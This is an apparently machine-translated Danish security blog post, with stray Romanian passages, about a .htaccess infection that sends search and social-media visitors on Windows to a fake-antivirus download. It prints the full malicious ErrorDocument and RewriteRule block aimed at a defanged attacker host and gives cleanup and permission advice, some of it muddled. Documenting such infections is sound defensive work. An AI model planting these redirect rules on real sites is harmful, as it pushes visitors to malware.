En ny form for virus som jeg kan se, at man ikke ved meget om, det påvirker websteder, der hostes på upålidelige servere hvor brugerkonti / underdomænekonti kan “se” mellem dem. Mere præcist er hosting-kontiene alle placeret i mappen “vhosts“, og ophavsretten til brugermappe FRA “vhosts” det gives til en almindelig bruger… forhandler i de fleste situationer. Det er en typisk metode til webservere, der ikke bruger WHM/cPanel.

Virkningen af ​​.htaccess-virussen –  .htaccess Hack

virus påvirke filerne .htaccess af offerstedet. Linjer tilføjes / direktiv hvilken til omdirigere besøgende (kommer fra yahoo, msn, google, facebook, yaindex, twitter, myspace osv. websteder og portaler med høj trafik) til nogle websteder, der tilbyder “antivirus løsninger“. Det handler om falske antivirusløsninger, som jeg skrev om i indledningen fra Falsk antivirusfjerner.

Sådan ser en ud .htaccess berørt: (ikke få adgang til URL'erne i indholdet af linjerne nedenfor)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

Omskrivning af

RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*odnoklassniki.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*vkontakte.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*tube.*$ [NC,OR]
rewritecond %{http_referer} .*wikipedia.*$ [nc,or]
RewriteCond %{HTTP_REFERER} .*blogger.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*qq.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*amazon.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ebay.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*flickr.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejasmin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*soso.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*doubleclick.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*pornhub.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*orkut.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*livejournal.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wordpress.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*søg.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC]

RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* hxxp://wwww.peoriavascularsurgery.com/main.php?h=%{HTTP_HOST}&i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=r [R,L]

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* hxxp://wwww.peoriavascularsurgery.com/main.php?h=%{HTTP_HOST}&i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=4 [R,L]

Cei care folosesc WordPress vor gasi aceste linii in fisierul .htaccess FRA public_html. In plus, virusul creaza un .htaccess identic in folderul WP-Content.

*Sunt si situatii in care in loc de peoriavascularsurgery.com apare dns.thesoulfoodcafe.com sau alte adrese.

Hvad gør denne virus?

Odata redirectionat, vizitatorul este intampinat cu bratele deschise de mesajul :

Warning!
Your computer contains various signs of viruses and malware programs presence. Your system requires immediate anti virus check!
System Security will perform a quick and free scanning of your PC for viruses and malicious programs.

Indiferent pe ce buton apasam, suntem dusi catre pagina de “Min computer“, creata sa imite designul XP. Aici porneste automat “scanningsproces”, til sidst opdager vi det “vi er smittet”.

Efter at have trykket på OK eller Annuller, starter den Downloadaf en fil Setup.exe. Denne setup.exe er den falske antivirus som påvirker systemet. Det vil installere en række malware-applikationer, der yderligere vil udbrede de inficerede links, og udover disse en software anti-virus (også falsk), som offeret er inviteret til at købe.
De, der allerede har kontaktet denne form for virussen, kan bruge den Falsk antivirusfjerner. Det anbefales også at scanne hele harddisken. anbefale Kaspersky Internet Security eller Kaspersky Anti Virus.

Denne form for virus påvirker operativsystemerne for besøgende med operativsystemer Windows XP, Windows ME, Windows 2000, Windows NT, Windows 98 og Windows 95. Indtil nu er der ingen kendte tilfælde af infektion af Windows Vista og Windows 7 operativsystemerne.

Hvordan kan vi fjerne denne .htaccess-virus fra serveren, og hvordan kan vi forhindre infektion.

1. Analyse af filer og sletning af mistænkelige koder. For at sikre, at ikke kun filen er påvirket .htaccess det er godt at vi analyserer alle filerne .php og .js.

2. Vi omskriver .htaccess-filen og indstiller den chmod 644 eller 744 med kun skriverettigheder på bruger-ul ejer.

3. Når du opretter en hostingkonto til et websted, i mappen /hjem eller /webroot der oprettes automatisk en mappe, som normalt har brugerens navn (bruger til cpanel, ftposv.). For at forhindre skrivning af data og transmission af vira fra én bruger til en anden, anbefales det at indstille på hver brugermappe:

Chmod 644 Sau 744, 755 – angivet er 644.
chown -R nume_user nume_folder.
chgrp -R nume_user nume_folder

Det hele for at kontrollere, om tilstandene er indstillet korrekt. Noget som dette burde dukke op:

drwx–x–x 12 dinamiske dynamik 4096 6. maj 14:51 dinamik/
drwx–x–x 10 duran duran 4096 7. mar 07:46 duran/
drwx–x–x 12 reagensglas reagensglas 4096 29. jan 11:23 reagensglas/
drwxr-xr-x 14 express express 4096 26. februar 2009 express/
drwxr-xr-x 9 dem dem 4096 19. maj 01:09 dem/
drwx–x–x 9 gård gård 4096 19. dec 22:29 gård/

Hvis en af ​​ovenstående brugere vil have FTP Virusfiler, vil den ikke være i stand til at sende virussen til en anden hostet bruger. Det er en minimumssikkerhedsforanstaltning for at beskytte de konti, der er hostet på en webserver.

Fælles elementer i domæner, der er ramt af denne type virus.

Alle berørte domæner omdirigerer besøgende til websteder, der indeholder domænenavnet “/main.php?e=4&h“.

Denne “virus af .htaccess” påvirker enhver form for CMS (Joomla, WordPress, phpBBosv.), der bruger .htaccess.

.htaccess Virus Hack & Omdirigere.